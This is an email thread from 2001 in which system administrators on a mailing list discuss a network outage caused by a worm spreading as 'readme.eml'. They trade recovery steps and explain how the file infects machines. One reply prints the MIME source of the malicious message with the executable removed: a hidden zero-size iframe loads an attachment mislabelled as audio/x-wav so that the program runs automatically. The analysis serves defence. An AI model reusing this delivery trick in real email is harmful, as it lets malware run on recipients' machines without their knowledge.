.eml is a sound file type. if there's a sound embedded in a web page, it
executes. (at least in IE.
isn't that special.
Dan
-----Original Message-----
From: Adam Meixler [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:36 PM
To: NT System Admin Issues
Subject: RE: serious network down...readme.eml??
If it's like the one I've seen, it's an HTML mail that gets opened by
something like Outlook Express. The HTML mail has an attachment which it
calls from an iframe. The attachment is actually the exe which does the
infection. Here's the source of the eml, with the EXE (EA4DMGBP9p) taken
out:
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe>
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm<BR>
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm<BR>
</BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:24 PM
To: NT System Admin Issues
Subject: RE: serious network down...readme.eml??
Stupid Ev Question #327: eml files can be executed?
Thanks,
Evan
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:05 PM
To: NT System Admin Issues
Subject: RE: serious network down...readme.eml??
1 Unplug servers form network.
2 use ERD to recover.
3 send users home.
4 clean clients.
-----Original Message-----
From: Terry Manolakos [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues
Subject: serious network down...readme.eml??
My network is slammed with some uknown virus of some sort.....Both my NT 4.0
servers running MS-Exchange 6.5 have about 2300 alien files which were
deleted....a "readme.eml" is being executed by all users somehow
automtically and its infecting all my NT domain. I can not Ctrl+Alt+Delete
to log into any of the servers.....the display shows "initialization of the
dynamic link library C:\WINNT\system32\USER32.dll failed. The process is
terminating abnormally" OKaying this results in no effects....all servers
have this displayed onscreen. For the ones that have admin already logged
in, Services (control panel, settings) can not be accessed! "access to the
specified device, path, or file is denied"....it seems this virus has locked
onto this element. PDC is running Exchange (I know, never put'em
together...but we're still cleaning up after previous SysAdmins here), and
this has gone bezerk as well, with the same message onscreen.
Norton/Symantec doesn't recognize "readme.eml"....who out there can shine a
flashlite in this dark mess? thanks in advance.
Terry
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
This e-mail may be privileged and/or confidential, and the sender does not
waive any related rights and obligations. Any distribution, use or copying
of this e-mail or the information it contains by other than an intended
recipient is unauthorized. If you received this e-mail in error, please
advise me (by return e-mail or otherwise) immediately.
